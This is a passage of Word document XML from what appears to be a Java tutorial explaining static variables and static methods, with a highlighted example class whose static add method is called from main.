          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EAC76D" w14:textId="58233EA8" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="003E427B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54F162C2" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="003E427B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37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Key Point</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Static variables are initialized when the class is loaded into memory and shared by all instances of the class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B66953A" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="003E42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Static Methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3977A95D" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="003E427B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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static method belongs to the class rather than to any particular object of the class. It can be called using the class name and does not require an instance of the class to be created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA91FB7" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="003E427B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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tic methods can only directly access static variables and other static methods. They cannot access instance variables or instance methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79327B88" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="003E42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5E517CDD" w14:textId="77777777" w:rsidR="00E004B0" w:rsidRPr="00E004B0" w:rsidRDefault="00E004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0299883"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MathOperations</w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7730022C" w14:textId="77777777" w:rsidR="00E004B0" w:rsidRPr="00E004B0" w:rsidRDefault="00E004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0299883"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>add</w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> b</w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D054AA" w14:textId="77777777" w:rsidR="00E004B0" w:rsidRPr="00E004B0" w:rsidRDefault="00E004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0299883"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> a </w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> b</w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4CA8D7" w14:textId="77777777" w:rsidR="00E004B0" w:rsidRPr="00E004B0" w:rsidRDefault="00E004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0299883"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF62AF4" w14:textId="77777777" w:rsidR="00E004B0" w:rsidRPr="00E004B0" w:rsidRDefault="00E004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0299883"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DAAD3B" w14:textId="77777777" w:rsidR="00E004B0" w:rsidRPr="00E004B0" w:rsidRDefault="00E004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0299883"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B347B11" w14:textId="77777777" w:rsidR="00E004B0" w:rsidRPr="00E004B0" w:rsidRDefault="00E004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0299883"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Test</w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7761EB5A" w14:textId="77777777" w:rsidR="00E004B0" w:rsidRPr="00E004B0" w:rsidRDefault="00E004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0299883"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> main</w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[]</w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> args</w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028ED409" w14:textId="77777777" w:rsidR="00E004B0" w:rsidRPr="00E004B0" w:rsidRDefault="00E004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0299883"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> result </w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MathOperations</w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>add</w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Static method call</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6905F5" w14:textId="77777777" w:rsidR="00E004B0" w:rsidRPr="00E004B0" w:rsidRDefault="00E004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0299883"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>result</w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
